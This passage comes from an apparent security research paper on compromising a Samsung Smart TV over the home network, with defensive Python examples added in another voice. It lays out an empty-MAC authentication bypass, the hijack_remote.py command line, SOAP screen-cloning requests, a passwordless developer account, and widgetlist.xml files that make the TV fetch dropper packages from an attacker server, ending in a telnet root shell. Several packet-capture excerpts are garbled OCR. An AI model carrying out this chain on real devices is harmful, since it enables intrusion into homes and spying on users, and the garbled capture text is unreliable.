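    hdrs = parse_ssdp_response(SAMPLE_SSDP_RESPONSE)
    print("LOCATION:", hdrs["LOCATION"])
    print("controlURL:", find_control_url(SAMPLE_DESCRIPTION))
    print(build_soap_request("192.168.1.9:7676", "/smp_4_", "GetDTVInformation").decode())
```

Nothing in the captured exchange identifies or authenticates the client beyond a User-Agent string, so any host on the LAN that can receive the SSDP reply and reach port 7676 can walk this same path to the controlURL and post the actions listed above.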
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rinde & f Color Rules AB Aliases ~ 23 Columns + 

Fra... Time Date Local Adjusted Time Offset Process Name Source Destination Pro... Description = 

22 11:23:15 AM 5/25/2014 — 3,6132819  SmartView.App.exe 192,168,1.19 ., StcPort=54012, DstPort=55000, PayloadLen=0, Se: 
3.6147120 SrcPort- 55000, DstPort=54012, PayloadLer 


3.6181050 


‘SmartV¥iew.App.exe +, SrcPort=S5000, DstPort=54012, PayloadLen=0, Se 


30 1 5AMSj25/2014 4.3801881  SmartView.App.exe 192.168.1.19 TCP il +) SrcPort=55000, DstPort=54012, PayloadLen=226, Sec 
31 11:23:15 AM 5/25/2014 — 4.3820181  Smartview.App.exe 192.168.1.9 TCP TCP:Flags: SrcPort=54012, DstPort=55000, PayloadLen=89, Seq: 
32 11 5AM5/25/2014 4,3832965  SmartView.App.exe 192.168.1.19 TCP TCP:Flags: 

34 11:23:15 AM 5/25/2014 — 4.4070723  SmartView.App.exe 192.168.1.19 TCP  TCP:Flags: SrcPort=55000, DstPort=54012, PayloadLen-21, Seq: 
36 11 6 AM 5/25/2014 4,6075203  SmartView.App.exe 192.168.1.19 TCP TCP:[ReT 4 Flags. ..AP..., SrcPort-55000, DstPort=54012, Pay 
37 il 64M 5/25/2014 4,6075391  SmartView.App.exe 192.168.1.9 TCP TCP:Flags: + StcPort-54012, DstPort-55000, PayloadLen=0, Seq: _ 
P 11:93:93 AM C/2G/2n14 — 12 2467140 Smarkiai Ann axe- 199 1421.0 Tro GreDork—EAN1? NetOavtK—EENNN Davlaadi en—51 Sec: 
Frame Details x 


SrcPort: 54012 
DstPort: 55000 


«[ " 


SequenceNumber: 3153586113 (OxE 
AcknowledgementNumber: 31336531 __ 
DataOffset: 80 (0x50) 


Flags: ...AP... EIE c1 3 
Window: 4380 (scale factor Ox2) ||0062 F 
Checksum: Ox4EC?, Good 0070 
UrgentPointer: 0 (0x0) 007E = 

dy TCPPavlead: SaureeParr = tani? 7 


Sel Bytes: x 
sento E 


1.1.. 


iziDecodeAs | EE Width ~ [Prot Off: 20 (0x14) Frame Off: 104 (0x68) 
001C 46 78 CF O1 08 O1 00 80 
0024 10 OB A9 57 12 48 5C A3 
0038 AA AA 03 00 OO OO 08 00 


0046 40 00 80 06 21 D1 CO A8 


Txl.i.. 


.E 


' 2 Frame Comments | [48] Hex Details 


Figure 28: Remote controller packets. 


[Figure 29 screenshot: Network Monitor capture. Frame list: frames 22 to 37 of the SmartView.App.exe session between 192.168.1.19 (port 54012) and the TV at 192.168.1.9 (port 55000): the TCP handshake, a 27-byte client payload, a 226-byte TV reply, the 89-byte client authentication payload and a 21-byte TV reply. Frame details: DstPort: 55000, Flags: ...AP..., SequenceNumber: 3153586140, AcknowledgementNumber: 3133653412, Window: 4323 (scale factor 0x2), Checksum: 0xF68D, Good, Sel Bytes: 89, followed by the hex dump of the 89-byte payload.]
* SendBrowserCommand 
* SendMBRIRKey 
* SetAntennaMode 
* SetMainTVChannel 
* SetMainTVSource 
* SetRecordDuration 
* StartCloneView 
* StartInstantRecording 
* StopBrowser 
* StopRecord 
* StopView 

Figure 29: Remote controller authentication packet. 


[Figure 30 hex dump of the authentication payload; ASCII column: ...iphone..iapp.samsung@.d...MTkyLjE2OC4xLjE5..MTAtMEItQTktNTctMTItNDg=..Q1JBWllDT09LSUU=]


Figure 30: Remote controller authentication packet bytes. 


REMOTE CONTROL PROTOCOL 


In addition to the SOAP services, the TV provides a remote control 
service on port 55000. The details of the protocol are 
undocumented. Figure 28 shows some of the packets using this 
protocol. The protocol lets the client send remote controller 
keys over the network, which means that an application on a PC 
or smartphone can emulate remote controller key presses. 


Design weakness 


There is a design weakness in the authentication process. 
Figure 29 shows an authentication packet from the client. The 
client sends a message in a proprietary packet format. 
Figure 30 shows the hex representation of the payload bytes for 
authentication. Even though the format is not documented, it is 
fairly simple to reverse engineer. 


Table 6 shows the parsed hex bytes from the original packet: 
basically, the client sends its IP address, MAC address and 
hostname to the server. 


Field          | Data                                                                    | Format        | Description 
Unknown        | 00                                                                      | Unknown       | Unknown 
Length         | 14 00                                                                   | Short         | Length of the following string 
String         | 69 70 68 6F 6E 65 2E 2E 69 61 70 70 2E 73 61 6D 73 75 6E 67             | String        | iphone..iapp.samsung 
Payload length | 40 00                                                                   | Short         | 0x40 bytes of payload 
Unknown        | 64 00                                                                   | Unknown       | Unknown 
Length         | 10 00                                                                   | Short         | Length of the following string 
String         | 4D 54 6B 79 4C 6A 45 32 4F 43 34 78 4C 6A 45 35                         | Base64 string | Encoded: MTkyLjE2OC4xLjE5 / Decoded: 192.168.1.19 
Length         | 18 00                                                                   | Short         | Length of the following string 
String         | 4D 54 41 74 4D 45 49 74 51 54 6B 74 4E 54 63 74 4D 54 49 74 4E 44 67 3D | Base64 string | Encoded: MTAtMEItQTktNTctMTItNDg= / Decoded: 10-0B-A9-57-12-48 
Length         | 10 00                                                                   | Short         | Length of the following string 
String         | 51 31 4A 42 57 6C 6C 44 54 30 39 4C 53 55 55 3D                         | Base64 string | Encoded: Q1JBWllDT09LSUU= / Decoded: CRAZYCOOKIE 


Table 6: Remote controller authentication packet bytes. 


When the TV receives this packet, it displays a dialog box 
similar to the one shown in Figure 31. If the user allows the 
connection, then the client is able to send remote controller keys 
over the network. 


[Figure 31 screenshot, dialog on the TV: "Detected a new device. Do you want to allow it to access this Product? You can change later by selecting Network > AllShare Settings > Content Sharing."] 


Figure 31: Dialog on the TV. 


The design issue is obvious here. The information that the 
client uses for authentication is the client's own IP address, 
MAC address and hostname, all of which can easily be 
retrieved on the local network. The IP address and MAC 
address are constantly broadcast in ARP packets, and 
hostnames are sent out in Windows name service packets. You 
do need to figure out which machine is allowed access to the 
TV's remote controller service first, or you can try all the 
machines on the network to brute-force the authentication. At 
best, this authentication design is pretty weak. 


Vulnerability in implementation 


In addition to a fundamental design flaw for remote controller 
authentication, there is also an implementation flaw. According 
to my tests, the hostname and IP address are not even used for 
authentication. The attacker only needs to guess the MAC 
address, which is constantly broadcast over the local network. 


Offset (h)  00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 
00000000    00 14 00 69 70 68 6F 6E 65 2E 2E 69 61 70 70 2E   ...iphone..iapp. 
00000010    73 61 6D 73 75 6E 67 08 00 64 00 00 00 00 00 00   samsung..d...... 
00000020    00                                                . 


Figure 32: Remote controller — all authentication packet bytes. 


[Figure 33: code listing from hijack_remote.py. It builds encoded_ip, encoded_mac and encoded_hostname, assembles auth_body and auth_head into auth_str, sends it with self.sock.send(auth_str) and pretty-prints the reply.] 


Figure 33: Authentication packet sending routine 
(hijack_remote.py). 
Field          | Data                                                        | Format        | Description 
Unknown        | 00                                                          | Unknown       | Unknown 
Length         | 14 00                                                       | Short         | Length of the following string 
String         | 69 70 68 6F 6E 65 2E 2E 69 61 70 70 2E 73 61 6D 73 75 6E 67 | String        | ASCII: iphone..iapp.samsung 
Payload length | 08 00                                                       | Short         | 0x08 bytes of payload 
Unknown        | 64 00                                                       | Unknown       | Unknown 
Length         | 00 00                                                       | Short         | Length of the following string 
String         |                                                             | Base64 string | Empty 
Length         | 00 00                                                       | Short         | Length of the following string 
String         |                                                             | Base64 string | Empty 
Length         | 00 00                                                       | Short         | Length of the following string 
String         |                                                             | Base64 string | Empty 


Table 7: Remote controller — all authentication packet bytes. 


But there is one more issue: if the client sends an empty string 
as the MAC address, the server always allows the connection, 
provided that any client was previously allowed for the service. 


Figure 32 shows the hex bytes of the payload that was used for 
authentication bypass. Table 7 shows the parsed hex bytes, and 
you can see that the length fields for IP address, MAC address 
and hostname are all 0 and the strings are empty. 


Figure 33 shows the code that sends this authentication packet. 
From line 18, if you pass an empty string for IP, hostname and 
MAC address, the authentication is bypassed. 
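The packet layout in Tables 6 and 7 is simple enough to decode by hand, and a decoder is also what a monitor on the home network needs in order to recognise the empty-MAC packet on port 55000. The following is an added example, not code from the paper or from hijack_remote.py: it parses the authentication payload as laid out in Table 6, lists the identity fields a client left blank, flags the empty-MAC bypass of Table 7, and decodes a remote-key token such as the Base64 KEY_VOLUP string discussed under 'Sending keys'. The two sample payloads are the bytes of Tables 6 and 7; the claimed_mac_matches check is an assumed extra comparison a monitor could make against the Ethernet frame, not something the TV does.

```python
import base64
import struct

# Authentication payloads exactly as laid out in Table 6 (a normal client
# sending IP, MAC and hostname) and Table 7 (the variant with all three
# identity fields empty). They are the paper's own bytes re-typed as hex;
# the first is the 89-byte payload of frame 31 in Figure 29.
NORMAL_AUTH = bytes.fromhex(
    "00"                                                   # unknown leading byte
    "1400" "6970686f6e652e2e696170702e73616d73756e67"       # "iphone..iapp.samsung"
    "4000"                                                 # body length, 0x40
    "6400"                                                 # unknown 0x0064
    "1000" "4d546b794c6a45324f4334784c6a4535"              # Base64 IP address
    "1800" "4d5441744d45497451546b744e5463744d5449744e44673d"  # Base64 MAC
    "1000" "51314a42576c6c445430394c5355553d"              # Base64 hostname
)
EMPTY_AUTH = bytes.fromhex(
    "00" "1400" "6970686f6e652e2e696170702e73616d73756e67"
    "0800" "6400" "0000" "0000" "0000"                     # three empty strings
)

IDENTITY_FIELDS = ("ip", "mac", "hostname")


def _take_string(buf, off):
    """Read a little-endian 16-bit length and then that many bytes."""
    if off + 2 > len(buf):
        raise ValueError("truncated length field at offset %d" % off)
    (n,) = struct.unpack_from("<H", buf, off)
    off += 2
    if off + n > len(buf):
        raise ValueError("%d-byte string overruns the buffer" % n)
    return buf[off:off + n], off + n


def parse_auth_payload(payload):
    """Decode one remote-control authentication payload (Table 6 layout).

    Returns the application string, the body length and the three decoded
    identity fields; an empty length-prefixed field decodes to "".
    """
    if payload[:1] != b"\x00":
        raise ValueError("unexpected leading byte")
    app, off = _take_string(payload, 1)
    body, off = _take_string(payload, off)        # length-prefixed body
    if body[:2] != b"\x64\x00":
        raise ValueError("unexpected body marker")
    fields, boff = {}, 2
    for name in IDENTITY_FIELDS:
        raw, boff = _take_string(body, boff)
        fields[name] = (base64.b64decode(raw, validate=True).decode("ascii")
                        if raw else "")
    if boff != len(body) or off != len(payload):
        raise ValueError("trailing bytes after the last field")
    return dict(app=app.decode("ascii"), body_len=len(body), **fields)


def empty_auth_fields(payload):
    """Names of the identity fields the client left blank."""
    parsed = parse_auth_payload(payload)
    return [name for name in IDENTITY_FIELDS if parsed[name] == ""]


def is_bypass_attempt(payload):
    """Flag the empty-MAC packet: the TV accepts it once any client has been
    allowed, so it is the one signature worth alerting on. A non-empty MAC
    proves nothing either way, since a MAC is learnable from ARP traffic."""
    return "mac" in empty_auth_fields(payload)


def _norm_mac(mac):
    return mac.replace("-", "").replace(":", "").lower()


def claimed_mac_matches(payload, frame_src_mac):
    """Assumed extra check for a network monitor (not something the TV does):
    compare the MAC claimed inside the payload with the Ethernet source MAC
    of the frame that carried it. A mismatch shows a host presenting another
    device's identity; a match is not proof, as a sender controls its frames."""
    claimed = parse_auth_payload(payload)["mac"]
    return bool(claimed) and _norm_mac(claimed) == _norm_mac(frame_src_mac)


def decode_key_token(token):
    """Decode a remote-key payload: 'S0VZX1ZPTFVQ' -> 'KEY_VOLUP'."""
    key = base64.b64decode(token, validate=True).decode("ascii")
    if not key.startswith("KEY_"):
        raise ValueError("not a remote-key token: %r" % key)
    return key


if __name__ == "__main__":
    for label, pkt in (("normal", NORMAL_AUTH), ("empty", EMPTY_AUTH)):
        print(label, parse_auth_payload(pkt), "bypass:", is_bypass_attempt(pkt))
    print(decode_key_token("S0VZX1ZPTFVQ"))
```

The decoder is strict on purpose: a body length that disagrees with the three length-prefixed fields, or bytes left over after the hostname, raises rather than being silently ignored, so malformed packets on port 55000 surface as errors instead of being misread as legitimate authentications.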


Sending keys 


Now that you can authenticate as a valid SmartView client, you 
need to figure out how to send remote controller keys. For 
example, Figure 34 shows a packet that is sending a key. The 
payload is ‘S0VZX1ZPTFVQ’, which is the base64-encoded 
string ‘KEY_VOLUP’. This key is used for the volume up 
function. 


Figure 35 shows the main code that sends remote controller 
keys. The keys are in the form of strings, and various keys can 
be retrieved from a packet dump of the SmartView sessions. 


Exploiting 


Now that we can send any remote controller keys, we want to 
find out if anyone has previously used the SmartView feature 
and allowed at least one client. 


For example, ‘HOME-PC’ is a legitimate user PC. If a user 
wants to use the SmartView feature, they authenticate the PC 
from the TV screen by allowing the device named ‘HOME-PC’ 
(see Figure 36). 


When a SmartView client is allowed, an access control list is 
added to the ‘Content Sharing’ menu (see Figure 37). 


Now the attacker wants to take control and uses the SmartView 
client from a machine that is connected to the local network. 
Let's assume that they have already gained control of one of the 
machines on the local network and are trying to get into the TV 
to perform additional attacks. When they try to authenticate the 
machine under their control, a pop-up dialog appears (Figure 
38). 


[Figure 34 screenshot: Network Monitor capture. Frame list: frames 24 to 78 of the SmartView.App.exe session between 192.168.1.19 (port 54012) and the TV at 192.168.1.9 (port 55000), ending with a 51-byte client payload (frame 77) and the TV's acknowledgement. Frame details: SequenceNumber: 3153586229, AcknowledgementNumber: 3133653433, Flags: ...AP..., Window: 4318 (scale factor 0x2), Checksum: 0xD684, Good; the hex pane's ASCII column shows the iphone...iapp.samsung header followed by the Base64 key S0VZX1ZPTFVQ.] 


Figure 34: Remote controller packets. 


[Figure 39: code listing from hijack_remote.py that sends the enter key, shown beside the TV's 'Detected a new device' dialog.] 


Figure 39: Enter key sending code (hijack_remote.py). 


One click of the enter key is needed for this connection to be 
allowed. The attacker can use the remote controller exploit here. 
Figure 39 shows the code from the hijack_remote.py script that 
bypasses authentication and sends KEY_ENTER to the TV. 


The hijack_remote.py script is run as shown in Figure 40. The 
first argument is the TV’s IP address and the second is the MAC 
address. If you know the MAC address of any device that has 
already been authenticated, you can put that here. However, if 
you put an empty string here, it tries to exploit the empty MAC 
bypass issue. 


ython27\python hijack_remote.py 192.168.1.9 "" 


Figure 40: Running hijack_remote.py. 


When the exploit is successful, the attacker is registered as an 
allowed ‘Content Sharing’ client (see Figure 41). 


[Figure 38 screenshot, dialog on the TV: "Device Name: ATTACKER. Detected a new device. Do you want to allow it to access this product? You can change later by selecting Network > AllShare Settings > Content Sharing."] 


Figure 38: Attacker tries to authenticate. 


[Figure 41 screenshot: the Content Sharing access control list on the TV with the attacker's device listed as allowed.] 


Figure 41: Content sharing access control list. 
[Figure 42 screenshot: SmartView PC application window titled "SmartView - [Samsung LED55]" with the View function active.] 


Figure 42: SmartView PC application with View. 


POST /smp_4_ HTTP/1.0 
HOST: 192.168.1.9:7676 
CONTENT-LENGTH: 301 
CONTENT-TYPE: text/xml;charset="utf-8" 
USER-AGENT: DLNADOC/1.50 SEC_HHP_CRAZYCOOKIE/1.0 
SOAPACTION: "urn:samsung.com:service:MainTVAgent2:1#StartCloneView" 

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:StartCloneView 
xmlns:u="urn:samsung.com:service:MainTVAgent2:1"><ForcedFlag>Normal</ForcedFlag><DRMType>PrivateTZ</DRMType></u:StartCloneView></s:Body></s:Envelope> 


Figure 43: Screen cloning request. 


HTTP/1.1 200 OK 
Content-Length: 386 
Content-Type: text/xml; charset="utf-8" 
DATE: Thu, 01 Jan 1970 01:01:09 GMT 
EXT: 
SERVER: UPnP/1.0 
Connection: close 

<?xml version="1.0" encoding="utf-8"?><s:Envelope 
xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> 
<s:Body> 
<u:StartCloneViewResponse 
xmlns:u="urn:samsung.com:service:MainTVAgent2:1"><Result>OK</Result> 
<CloneViewURL>http://192.168.1.9:9090/livestream/1</CloneViewURL></u:StartCloneViewResponse> 
</s:Body> 
</s:Envelope> 


Figure 44: Screen cloning response. 


INSTALLING A BACKDOOR 


Now we have a way to send any remote controller key to the 
TV. You might think that this glitch isn't all that useful for 
attackers — but imagination is the only limit here. One attack 
scenario we can think of is to change DNS settings in the 
network settings, or possibly to reroute all traffic to the 
attacker's server. Another possibility might be to install malware 
on the TV. From here, we will demonstrate a way in which 
malware can be installed on the TV remotely using a remote 
controller flaw. 


Clone view 


The PC version of the SmartView application supports a 
remote view function in addition to the remote controller 
function (Figure 42). This feature is really useful when 
attacking because the attacker can see the TV screen remotely. 
This could reveal the contents of any app being used, such as 
social apps, or browser and messenger tools like Skype. This 
means that the user's privacy, while using the TV, will be 
compromised. 


This clone view feature is actually implemented through a 
SOAP message and a livestream application. The SmartView 
client sends a SOAP message to the smp_4_ application using 
the StartCloneView method (Figure 43). If the client has already 
been authenticated through the remote controller service, the 
server starts view cloning and replies with a message that 
contains a URL for streaming (see Figure 44). 
The client sends a request to the livestream server to retrieve 
livestream data (Figure 45), and the server sends out a constant 
stream of livestream data in HDCP format (see Figure 46). 


GET /livestream/1 HTTP/1.1 
User-Agent: Lavf52.104.0 
Accept: */* 
Host: 192.168.1.9:9090 


Figure 45: Livestream request. 


HTTP/1.0 200 OK 
Content-type: application/octet-stream 
Cache-control: no-cache 

[binary stream data] 


Figure 46: Livestream response. 


[Figure 47 screenshot: SmartView - [Samsung LED55] window showing the Samsung account login screen on the TV.] 


Figure 47: Log into Samsung account. 


[Figure 48 screenshot: the same login screen with 'develop' entered in the email field.] 


Figure 48: Input ‘develop’ account in email field. 


Developer account 


There are apps for a Samsung TV that can be downloaded from 
the Samsung app store. To get into the app store you need to log 
in using a Samsung account (see Figure 47). There is a feature 
called a developer account, which is a reserved login name 
called ‘develop’, and if you log in with that name, the TV is 
automatically switched to a developer mode (Figure 
48). Creation of the developer account differs for each 
model, but for this F-series TV, the account is already 
created and there is no password associated with it. 


[Figure 52: sample widgetlist.xml, with the same structure as Figure 55: a widget titled App of type user whose download URL is http://192.168.1.19/Widget.zip.] 


Figure 52: Sample widgetlist.xml. 


When you successfully switch the machine to 
developer mode, you get special access to a hidden 
menu. From More Apps, if you check the options, it shows 
the ‘IP Setting’ and ‘Start App Sync’ menu items, which 
were not shown before (see Figure 49). 


[Figure 54: archive listing of C:\Program Files (x86)\Apache Group\Apache2\htdocs\Dropper.zip\data\ containing a single file of 1,040,850 bytes (modified 2013-11-24 15:14, created 2014-05-28 00:48).] 


Figure 54: Dropper contents. 


By selecting ‘IP Setting’ here, an attacker can input the 
address of a web server that they control (see 
Figure 50). 


After that, the attacker can use the ‘Start App Sync’ 
feature to install their malicious app on the machine 
(see Figure 51). 


<?xml version="1.0" encoding="UTF-8"?> 
<rsp stat="ok"> 
<list> 
<widget id="Dropper"> 
<title>Dropper</title> 
<type>user</type> 
<compression size="103000" type="zip"/> 
<description></description> 
<download>http://192.168.1.19/Dropper.zip</download> 
</widget> 
</list> 
</rsp> 


Figure 55: Dropper widgetlist.xml. 
App sync & application security issues 


When you choose to start App Sync, the More Apps 
program tries to connect to the web server on port 80 
running on the machine specified in the IP settings. 
When it finds a web server at that address, it retrieves a 
/widgetlist.xml file and parses it. A sample 
widgetlist.xml is shown in Figure 52. The download tag 
specifies the ZIP file that contains the TV app. 
Simply reusing the Samygo F-series rooting app and 
installing it over App Sync might install a remote shell 
and FTP server, which is enough to demonstrate remote 
compromise through SmartView. But, if you try to 
install the rooting app through the developer account, 
the app will not be installed, and a security warning 
will be displayed (see Figure 53). 


[Figure 53 screenshot: the security warning shown by the More Apps installer, with a URL explaining the reasons for the rejection.] 


Figure 53: Application security issue. 


[Figure 56: archive listing of C:\Program Files (x86)\Apache Group\Apache2\htdocs\RemoteRooting.zip containing config.xml, index.html, widget.info, a JavaScript folder and two further entries, with sizes, packed sizes and 2014-05-28/29 timestamps.] 


Figure 56: RemoteRooting package contents. 


[Figure 57: Main.js listing showing the packagePath setting.] 


Figure 57: Package path with installer. 


<?xml version="1.0" encoding="UTF-8"?> 
<rsp stat="ok"> 
<list> 
<widget id="RemoteRooting"> 
<title>RemoteRooting</title> 
<type>user</type> 
<compression size="103000" type="zip"/> 
<description></description> 
<download>http://192.168.1.19/RemoteRooting.zip</download> 
</widget> 
</list> 
</rsp> 


Figure 58: RemoteRooting widgetlist.xml. 


Dropper hack 


To investigate further, if you follow the URL given in the error 
message, it describes many different reasons for the security 
warning occurring. One notable fact is that if you embed a binary 
file (ELF in this case), the app is not allowed to install. This is a 
countermeasure to prevent the installation of any unwanted ELF 
binaries on the system. The Samygo rooting app relies on 
replacing a Skype shared library. Even when it is archived in a 
ZIP file, it is still detected by the app installer and rejected. You 
might think of encoding the file, but there is no easy way to 
decode it on the fly from the TV app. The Samygo rooting app 
relies on an Unzip function from the file system plug-in object, so 
there is no room for decoding the contents during the process. 


In order to copy an ELF binary you want to install on the 
system, you need to find a glitch in the app installer's security. 
As it happens, I found one. Even when the app is rejected, the 
whole contents are left in an easily guessable location under 
/mtd_rwcommon/common/TempDownLoad. For example, if you 
installed an app called Test, the following folder on the TV 
system would contain the entire contents: 


/mtd_rwcommon/common/TempDownLoad/Test 


Using this fact, we can drop an ELF binary on the system and 
use it later from another app. Even though it triggers a security 
violation error, we can still drop a file we want and use it from 
an app we launch later. 
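The installer check described above (reject a package that embeds an ELF binary, even one archived inside a nested ZIP) and the gap that follows it (the rejected contents stay under TempDownLoad) can both be shown in a small model of that check. This is an added example, not Samsung's installer code; the package contents, widget names and staging directory are constructed. It scans a widget ZIP for the ELF magic, descends into ZIP files stored inside the package, and only extracts a package once it has passed, so a rejected package never reaches the staging directory.

```python
import io
import os
import shutil
import tempfile
import zipfile

ELF_MAGIC = b"\x7fELF"
ZIP_MAGIC = b"PK\x03\x04"


def find_elf_members(zip_bytes, prefix=""):
    """List every member of the package that starts with the ELF magic,
    descending into ZIP files stored inside the package (the case the paper
    describes: a rooting archive nested in the app ZIP is still caught)."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info)
            name = prefix + info.filename
            if data[:4] == ELF_MAGIC:
                found.append(name)
            elif data[:4] == ZIP_MAGIC:
                try:
                    found.extend(find_elf_members(data, name + "!"))
                except zipfile.BadZipFile:
                    found.append(name + "!<unreadable archive>")
    return found


def install_widget(zip_bytes, staging_root, widget_id):
    """Model installer: scan first and extract only a clean package, so a
    rejected package leaves nothing behind in the staging directory.
    Returns (installed, rejected_members)."""
    rejected = find_elf_members(zip_bytes)
    if rejected:
        return False, rejected
    dest = os.path.join(staging_root, widget_id)
    real_dest = os.path.realpath(dest)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        infos = zf.infolist()
        # Validate every member path before writing anything, so a bad
        # package cannot escape the widget directory or be half-extracted.
        for info in infos:
            target = os.path.realpath(os.path.join(dest, info.filename))
            if os.path.commonpath([real_dest, target]) != real_dest:
                raise ValueError("unsafe path in package: %s" % info.filename)
        for info in infos:
            zf.extract(info, dest)
    return True, []


def build_sample_package(with_elf=False, nested=False):
    """Constructed sample widget ZIP (not a real Samsung package): config.xml,
    index.html and Main.js, plus optionally a file that begins with an ELF
    header, stored either directly or inside a nested ZIP."""
    fake_elf = ELF_MAGIC + b"\x01\x01\x01" + b"\x00" * 61   # header bytes only
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("config.xml", "<widget/>")
        zf.writestr("index.html", "<html></html>")
        zf.writestr("Main.js", "// constructed placeholder")
        if nested:
            inner = io.BytesIO()
            with zipfile.ZipFile(inner, "w") as izf:
                izf.writestr("data/patch", fake_elf)
            zf.writestr("data/inner.zip", inner.getvalue())
        elif with_elf:
            zf.writestr("data/patch", fake_elf)
    return buf.getvalue()


def simulate_installs():
    """Run three sample packages through install_widget in a throwaway
    staging directory and report what installed and what was left behind."""
    root = tempfile.mkdtemp(prefix="TempDownLoad_")
    results = {}
    try:
        for widget_id, pkg in (("CleanWidget", build_sample_package()),
                               ("ElfWidget", build_sample_package(with_elf=True)),
                               ("NestedWidget", build_sample_package(nested=True))):
            installed, rejected = install_widget(pkg, root, widget_id)
            results[widget_id] = {
                "installed": installed,
                "rejected": rejected,
                "left_on_disk": os.path.isdir(os.path.join(root, widget_id)),
            }
    finally:
        shutil.rmtree(root, ignore_errors=True)
    return results


if __name__ == "__main__":
    for widget_id, outcome in simulate_installs().items():
        print(widget_id, outcome)
```

Running simulate_installs() installs the clean package and rejects the other two, and the result records that nothing was left on disk for the rejected ones. That is the ordering the TV's installer gets wrong: it stages the package first and rejects it afterwards, which is why the rejected contents remain under TempDownLoad for a later app to use.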
[Figure 59 screenshot: More Apps 'Update Apps' progress ending in 'Update Complete'.] 


[Figure 60 screenshot: the More Apps list with the installed RemoteRooting app.] 


Figure 60: Run RemoteRooting app. 


[Figure 61 screenshot: the RemoteRooting app's 'Setup SamyGO files' output, copying the SamyGO files into place under /mtd_rwcommon and starting the telnet and FTP services.] 


Figure 61: RemoteRooting result. 


[Figure 62: telnet session to port 23 on the TV giving a root shell.] 


Figure 62: Access to the TV with root privilege. 


For example, I packaged the ‘patch’ file inside a dropper app 
(Figure 54). This file is from the Samygo rooting app and it 
contains multiple ELF binaries. 


The widgetlist.xml file is shown in Figure 55. 


The More Apps installer triggers a security warning but you can 
just dismiss the message. The file we want is now dropped on 
the system. 


Installer 


Now we need to make a new package without any ELF binaries 
(Figure 56). 


One thing we need to do is to change packagePath in Main.js to 
the location where our dropper package is dropped (Figure 57). 


The widgetlist.xml file is shown in Figure 58. 


When you perform app sync, it succeeds without any warning 
(Figure 59). 


You can confirm that the RemoteRooting app just installed on 
the TV system (Figure 60). 


When you launch the app, you see a screen similar to Figure 61. 
Now the Samygo package, including a remote shell and FTP 
server, is installed. You can confirm this by connecting to the 
TV on port 23: you have root privilege on the system (Figure 62). 
From here, further attacks can be launched. 


CONCLUSION 


Smart devices are a new trend in the appliance industry, and 
smart TVs provide a good example of what to expect from 
them. The fact that they can be connected with other devices at 
home, like PCs or smart phones, initially seems very 
convenient. However, the way the overall architecture is 
designed is a little questionable. I used the SmartView feature of 
a Samsung Smart TV to showcase how weak the design of a 
proprietary protocol can be. Also, the actual implementation is 
so fragile that the whole authentication scheme fails when the 
client supplies unexpected input. I also used a weakness in the 
app installer to bypass a security error related to an embedded 
ELF binary. As you have seen, it is possible to install malware 
on the TV using the method I presented here. 


It’s been a while now since the home appliance industry started 
pushing these smart appliances. When these vendors are 
creating new features and developing new technology to support 
them, they might learn some valuable lessons from the past few 
decades of the PC industry. Even when it doesn’t seem likely 
that malware or actual attacks will happen for these smart 
appliances in the foreseeable future, you never know. Better to 
prepare early rather than late. If the new smart appliances don’t 
gain the trust of their users, they won’t ever be used for any 
critical purposes like confidential Skype calls or private social 
networking. The TV already comes with Skype, browser and 
social apps: If the TV can’t give users assurance of its secure 
operation, users will be too ‘smart’ to use it. 